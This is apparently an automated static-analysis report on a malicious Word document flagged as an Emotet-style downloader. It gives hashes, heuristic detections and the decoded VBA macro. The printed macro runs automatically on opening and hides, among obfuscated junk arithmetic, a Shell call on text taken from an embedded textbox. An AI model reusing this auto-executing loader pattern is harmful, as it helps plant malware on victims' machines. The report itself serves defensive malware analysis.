Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5f82efb7e9739f98…

MALICIOUS

Office (OLE)

71.8 KB Created: 2018-12-17 10:22:00 Authoring application: Microsoft Office Word First seen: 2019-10-29
MD5: fc8c4d83c810db9836f0e9e0678a26c6 SHA-1: b18e0194ff973fc0353c2dd23326bad942126713 SHA-256: 5f82efb7e9739f98c4a85c12cf7df179250d82eb8a1115327dce1ad5c8ca6de8
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. This is further supported by SC_STR_CMD and SC_STR_POWERSHELL firings, suggesting the execution of system commands or PowerShell. The presence of an AutoOpen macro (OLE_LEGACY_WORDBASIC_AUTOEXEC, OLE_VBA_AUTOOPEN, OLE_VBA_PCODE_AUTOEXEC_EXEC) indicates that the malicious code executes automatically upon opening the document. The ClamAV detection also confirms its malicious nature.

Heuristics 10

  • ClamAV: Doc.Malware.Emodldr-6787352-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-6787352-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
          adIiZnQEzmBBSRdCYUzckvU = 168840065 - wnzbWilCQfjwNaAhlQLVh
QPMQJ = Array(tQiISkJ, IVGXtzBS, SECmHOYQS, Interaction.Shell(XFJMPOnthEF, kTpOWX), WmYLlr)
   YjaLmjZYjCALOTjfBKIFR = QzQVkZVGittuLtwlaFj * Rnd(110903311 / Sin(SCiHwQmlrIUTzSbvRwAD)) / Wfd + Int(166487093 - Rnd(132765174 - Tan(48963279) * 114310069 - Cos(HpjQjCYAtzwiOoJjVr)) / 242902062 * Sin(164233982 / Tan(177782734) / 76629910 / Hex(177246667))) + 138329392 + CStr(280294223) - 60769318 / CLng(60505763) * 209953532 - Fix(89937157 - Hex(41990454) * 333456932 / ChrW(QnobDVHFwTGVfMDHrTEcWss / 318058326))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
riwpGDVj
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9207 bytes
SHA-256: f25def3b404953428858f1cad041132aa26f529942ea20c0ea9d23c4caccc5fe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
125 of 159 identifiers look randomly generated (e.g. 'AqXpJEYLNrwZmnAwkWHQaDpz') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BNIGFWKSioiC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
riwpGDVj
End Sub

Attribute VB_Name = "vbNsDXh"
Function riwpGDVj()
On Error Resume Next
   zjDZSddkhjlkLDdJziaGOZ = PLELiPDUHSuQhiqoSIoXqiz * Rnd(226924394 / Sin(wYSoQbZYmoOOSuUi)) / Wfd + Int(76360592 - Rnd(200214894 - Tan(116193111) * 111822735 - Cos(wfIpHzZBDhNVzmrljqqVru)) / 278014337 * Sin(188069204 / Tan(177073386) / 770095 / Hex(95511825))) + 133872034 + CStr(297422891) - 206460474 / CLng(29362178) * 207378483 - Fix(115101659 - Hex(177170170) * 3391302 / ChrW(JzJizXjGAsVIdtfoavvBpjO / 46717383))
      EIXciEWlwbhjMVULjciiG = 283418236 - AQEVfzDdkCvvPLiRozWfRwHO
   oFIkkTBcwAVoBslws = aVCnnlbwYsEzsz * Rnd(84345796 / Sin(WoWzbOAjtujVwjSdZfjSPA)) / Wfd + Int(120567625 - Rnd(154137174 - Tan(55151979) * 261586533 - Cos(JYzHXbOWzZtaMVWttBGArZb)) / 167144783 * Sin(88947611 / Tan(114068611) / 307951295 / Hex(152469610))) + 142336454 + CStr(143663558) - 339595804 / CLng(284795058) * 260904730 - Fix(127380290 - Hex(284817242) * 50540149 / ChrW(mMthKUDjEUwsHYWCnDjzYuGh / 286984026))
      caBmsdOwGoMShE = 156121755 - IwziNwdoAPHKYsGMpJsdiRb
   ffRVdWhEozSTkZlsKjmwjwd = cshwqZizuMZQMvlHOUfPc * Rnd(322357135 / Sin(imsQuJVHiCislpjOOQSZYAV)) / Wfd + Int(214833230 - Rnd(95464734 - Tan(311133520) * 204071094 - Cos(PRNGfzwMwJnpYEqNdDzSf)) / 42483929 * Sin(106154866 / Tan(336815917) / 64752995 / Hex(154862149))) + 149872125 + CStr(224532659) - 107823554 / CLng(74966160) * 10402149 - Fix(338980901 - Hex(203835859) * 265549103 / ChrW(RocMoqWPFccATKHDKvMBIBO / 318541467))
      aQwnHoKkMYYArLb = 56604681 - KWhXDXIIqESmjQajENaaczo
   HszVZtdzXvEOiFHiLMj = MKfBdHJBSAQlaZN * Rnd(143138011 / Sin(AzFjuqVwtwfSzBCDcLzNwrSk)) / Wfd + Int(187395677 - Rnd(217658410 - Tan(153244160) * 205982293 - Cos(oFslkKMiaSTKCkIdiT)) / 335363150 * Sin(92158970 / Tan(221983733) / 330572731 / Hex(90635049))) + 107070589 + CStr(57501631) - 9612531 / CLng(58898848) * 214518609 - Fix(135257600 - Hex(27940885) * 90151866 / ChrW(pfEsnhOqpYBtdCtHKG / 302877453))
      YRlqsbciBjKWEzUX = 208655899 - pBEIYIwUmGHBWNKAv
   UVAMGhNwMQmlUFAnWo = YCONXzLzzoYuojJkOwZb * Rnd(176928013 / Sin(UEtNCLtjShQaWT)) / Wfd + Int(39298793 - Rnd(58520488 - Tan(189207281) * 94657389 - Cos(iQHnVzEKVlpzNDXiKTJvAFQ)) / 143726373 * Sin(282855997 / Tan(199972974) / 93069783 / Hex(68299686))) + 278450251 + CStr(201506173) - 40156725 / CLng(145128917) * 73330879 - Fix(213722329 - Hex(289994146) * 241995077 / ChrW(QXQzAYudkCXwkvoS / 125994717))
      dzmwrjuUqfTmjLmWtwtzAhW = 290970126 - bqLFiRDsmOlaUjh
   pTNKfsqojAMHkcJftmLtI = ilCWpLiUzESRJBbjL * Rnd(186446971 / Sin(OUddRjCufwwZVbZo)) / Wfd + Int(181919236 - Rnd(53225567 - Tan(60093903) * 16593438 - Cos(JOCIpSTHDMajfuvAIlmn)) / 108125285 * Sin(337558829 / Tan(146656198) / 9765511 / Hex(206523073))) + 318653387 + CStr(277901332) - 234575870 / CLng(83988407) * 340523660 - Fix(162081629 - Hex(16483737) * 169853533 / ChrW(EFbVbRjncmWpphioTXWPP / 68932897))
      BctbjuDnXJzppZmJVEdXkfp = 43065575 - FYjBjKTuMashpzs
   DwrrwTfQuoEMjAAOGjuUjI = VABwOwLVibRbzHpvJFbLI * Rnd(167393954 / Sin(mNfDZQCEFvNVqzUQT)) / Wfd + Int(234213671 - Rnd(125227042 - Tan(147113783) * 245256737 - Cos(ZDGRnkPEwdvkOlitl)) / 36349701 * Sin(206727554 / Tan(151466772) / 74481744 / Hex(212095799))) + 236886403 + CStr(248939829) - 329795229 / CLng(327370551) * 268533446 - Fix(264622611 - Hex(52112602) * 185320561 / ChrW(DiUocwIcRoBwjaGjjhazNq / 93789965))
      sTUTqvbwUosFuzG = 320811668 - dNiJhzLrOFGhibMQMvIc
Const kTpOWX = 0
   XZKXjEKAkvVQcwCdTGXkOj = GNtIrKEzzBkncIEv * Rnd(230107384 / Sin(uXQsWiIwzKGKqbqPDKmwTqjw)) / Wfd + Int(142585891 - Rnd(95387809 - Tan(288872120) * 75132903 - Cos(VPLolUJtNqOAuKtqpLI)) / 318320085 * Sin(84272122 / Tan(31880877) / 305204143 / Hex(53122346))) + 255310620 + CStr(215051103) - 28048168 / CLng(287874401) * 117474899 - Fix(152981080 - Hex(50261971) * 254463132 / ChrW(WivuWEHhVpTYwYfmHjCiPNQV / 25226609))
      EPRcqjbCYjwvTG = 6666031 - rPbjqIYFKqEDiJNaq
   FXNiGIGmlmusVBB = nSjwjPZthDEArIpMnRjdn * Rnd(26967522 / Sin(VFumHRKjSwpfofLZqwTBD)) / Wfd + Int(28081432 - Rnd(36591125 - Tan(307919495) * 192102987 - Cos(hEEVYwjiLsocSbWTlDCcAjcr)) / 273366860 * Sin(206069093 / Tan(125891557) / 15867506 / Hex(217332622))) + 112523799 + CStr(339906561) - 339773725 / CLng(59352646) * 64242460 - Fix(235681449 - Hex(34131674) * 206620088 / ChrW(YqwFTTkNfrijSBsAwAcNfsfj / 12546678))
      tpTIsRonfLfuNJGbzbXzwzH = 56015118 - icSSfLQDZZvtWzNv
   UQZAuEcOKRccNbYwVMhKMi = bpmXAisPuzWZEZHnDdQ * Rnd(273642098 / Sin(DwQuVVnUwFclswKIjbj)) / Wfd + Int(117659005 - Rnd(12583847 - Tan(224625990) * 187002564 - Cos(BTXOYdhwtwXtVdfJFvwtunL)) / 178146278 * Sin(318630502 / Tan(201838718) / 154593679 / Hex(11489986))) + 215198959 + CStr(155983094) - 154576221 / CLng(142158245) * 133396359 - Fix(168414815 - Hex(294678871) * 10741630 / ChrW(ZvTYjsubRmDwaMGjiwOIwRuG / 207467706))
      VaBYwkdLfAfVNvRzi = 288137102 - FGKRllcitCHBMtQWTZ
   ChNoRtTWVCnaGsipBHuWR = OZWtDrPTwjPbdpvQjKHckW * Rnd(244782030 / Sin(ZWYYnRHCTQSnRXqc)) / Wfd + Int(48667863 - Rnd(13089524 - Tan(37050500) * 44740714 - Cos(iOsulXjOoBsoLUjS)) / 278875285 * Sin(207116769 / Tan(206373118) / 164096270 / Hex(85304442))) + 52861487 + CStr(85966038) - 153742701 / CLng(51747305) * 331424615 - Fix(81697512 - Hex(129573039) * 209313602 / ChrW(iQiwuHjiCtXoiOZzGD / 67621264))
      RWahwWBUmnLQiTTc = 65415235 - ZYlLdlBYdwzIrIJW
XFJMPOnthEF = BNIGFWKSioiC.TextBox1.Text + wAXGLsPi + Lvzpu + XFtojZt + dvCGMP + NMBSaTN + TSCASziX
   PCEAMmQiTCBRDVIRiiwaiv = DLhlNsjEmhUiUi * Rnd(92594661 / Sin(DUTSUNUBYPcvrQ)) / Wfd + Int(94945356 - Rnd(75725581 - Tan(128084568) * 330672693 - Cos(oiAClmwPjimnmQ)) / 177279690 * Sin(310140622 / Tan(42165739) / 77556526 / Hex(192432771))) + 233869279 + CStr(275916478) - 285992846 / CLng(215132450) * 88007235 - Fix(333481807 - Hex(103351123) * 246224250 / ChrW(VTJPWdZZCRhfWwlS / 245570062))
      piQVIzqOKwwnEWBluPZ = 156000810 - IrBsoizMrGOcXZHwz
   ONtThXsojFAmqDjOjw = RcOAqYnwrBZaiFO * Rnd(322649252 / Sin(DaIXLbSDpbkbuEjifT)) / Wfd + Int(295102257 - Rnd(338999937 - Tan(84471823) * 14821778 - Cos(tYAmHiVjcGNLJolFBwwBzDW)) / 322488657 * Sin(322771529 / Tan(273534731) / 315557261 / Hex(338718825))) + 250203687 + CStr(140976816) - 325991669 / CLng(42581721) * 4999689 - Fix(207234896 - Hex(99223587) * 335321470 / ChrW(pLYUvHVhsaquOrCP / 6805655))
      pBDpRjVuHIHLdYmuMlYjBwBP = 27404532 - FFXduqzhZzHztpwAA
   ONzANInHEiQPRGGVUfH = wiwzOkMXlzXrkZqzzwhqsCzS * Rnd(96661716 / Sin(RJwwwzCBZjOzmdvPWH)) / Wfd + Int(73254060 - Rnd(161040337 - Tan(206119474) * 292790460 - Cos(IYYzQHwfjjsTDYowa)) / 270433498 * Sin(228516641 / Tan(341814743) / 46072187 / Hex(233211831))) + 325468002 + CStr(63671180) - 24056369 / CLng(311054276) * 189627565 - Fix(211978531 - Hex(287368737) * 48982692 / ChrW(qYtqYazmucEiQuKrqhIkjw / 293318071))
      YbOuViQnYtBuJiP = 158857212 - CoXCBhPtDmwiWGujlRz
   WwJWASShSZJluwLwPkqT = fkRfKSsTwAWAXZqfzR * Rnd(135319647 / Sin(WfEptrjlUwGVOJrOrqqA)) / Wfd + Int(174746752 - Rnd(90447140 - Tan(132398715) * 160640606 - Cos(lWXUSPSWozzjcmSiGwztBl)) / 91509732 * Sin(226042140 / Tan(183731044) / 263454772 / Hex(60406812))) + 180108820 + CStr(134808436) - 26906735 / CLng(54941723) * 74143926 - Fix(209685947 - Hex(16003658) * 53230237 / ChrW(MRCjowaMriPEXRUPUi / 244742423))
      IosiGrBkpoAaizVpwQFCLBrt = 163126241 - DDjtqBRIMXYXdz
   aZScKwpbEjjEnzO = RRcScJnWXJrwVKWaCjXrGKz * Rnd(48629737 / Sin(DjcDZqJqjVKGBcQlwFBH)) / Wfd + Int(296411764 - Rnd(37699321 - Tan(302816958) * 80831729 - Cos(CGZXnHUVlZZLSzS)) / 219218566 * Sin(39231573 / Tan(272329853) / 273981261 / Hex(82591273))) + 129878496 + CStr(4331255) - 32030388 / CLng(48016802) * 38443387 - Fix(67864784 - Hex(33285242) * 315578164 / ChrW(nzpQzXjkSsNplP / 16177949))
      adIiZnQEzmBBSRdCYUzckvU = 168840065 - wnzbWilCQfjwNaAhlQLVh
QPMQJ = Array(tQiISkJ, IVGXtzBS, SECmHOYQS, Interaction.Shell(XFJMPOnthEF, kTpOWX), WmYLlr)
   YjaLmjZYjCALOTjfBKIFR = QzQVkZVGittuLtwlaFj * Rnd(110903311 / Sin(SCiHwQmlrIUTzSbvRwAD)) / Wfd + Int(166487093 - Rnd(132765174 - Tan(48963279) * 114310069 - Cos(HpjQjCYAtzwiOoJjVr)) / 242902062 * Sin(164233982 / Tan(177782734) / 76629910 / Hex(177246667))) + 138329392 + CStr(280294223) - 60769318 / CLng(60505763) * 209953532 - Fix(89937157 - Hex(41990454) * 333456932 / ChrW(QnobDVHFwTGVfMDHrTEcWss / 318058326))
      NZatsmnzCRaAhjzjf = 190526624 - FFpdFBotCVYYurM
   BERAMTwnhszCwzo = AqXpJEYLNrwZmnAwkWHQaDpz * Rnd(180991939 / Sin(ErNfjuqKzlJTzzjFmVUYBu)) / Wfd + Int(285483584 - Rnd(15736758 - Tan(121846422) * 172627391 - Cos(XWwBXOWzjziKEjbpPnQWKkU)) / 113791680 * Sin(128592926 / Tan(205929039) / 19831817 / Hex(251256036))) + 64444140 + CStr(2482966) - 73768814 / CLng(86458834) * 41459293 - Fix(17576855 - Hex(119905054) * 265108796 / ChrW(klFdzzIELQoZFc / 96914293))
      DhnBfhsLkpjmUE = 11011084 - npiCLtMkMMIOOMEYw
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.